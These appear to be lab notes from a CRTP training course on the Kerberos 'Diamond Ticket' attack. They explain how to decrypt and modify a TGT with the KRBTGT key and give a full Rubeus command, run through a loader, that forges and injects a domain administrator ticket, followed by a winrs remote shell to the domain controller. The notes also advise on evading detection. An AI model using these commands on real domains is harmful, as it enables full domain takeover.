Diamond Ticket

Diamond Ticket

Diamond Ticket attack decrypts the TGT, modifying it and re-encrypting it using the AES keys of the KRBTGT account. Golden Ticket was TGT forging attack whereas diamond ticket is a TGT modification attack.

  • A diamond ticket is more opsec safe as it has:

    • Valid ticket times because a TGT issued by the DC is modified

    • In golden ticket, there is no corresponding TGT request for TGS/Service ticket requests as the TGT is forged.

  • A diamond ticket should be chosen over a golden ticket in a real assessment.

In the below command, we modify the TGT after decryption with the user account and group we want. 

# Open cmd with elevated privs
# KRBKEY is same as KRBTGT account's RC4/AES key
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args %Pwn% /krbkey:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /tgtdeleg /enctype:aes /ticketuser:administrator /domain:dollarcorp.moneycorp.local /dc:dcorp-dc.dollarcorp.moneycorp.local /ticketuserid:500 /groups:512 /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

# This should spawn a new admin shell via which we can get any user's shell.

winrs -r:dcorp-dc cmd
PreviousCRTP Lab 9NextCRTP Lab 10

Last updated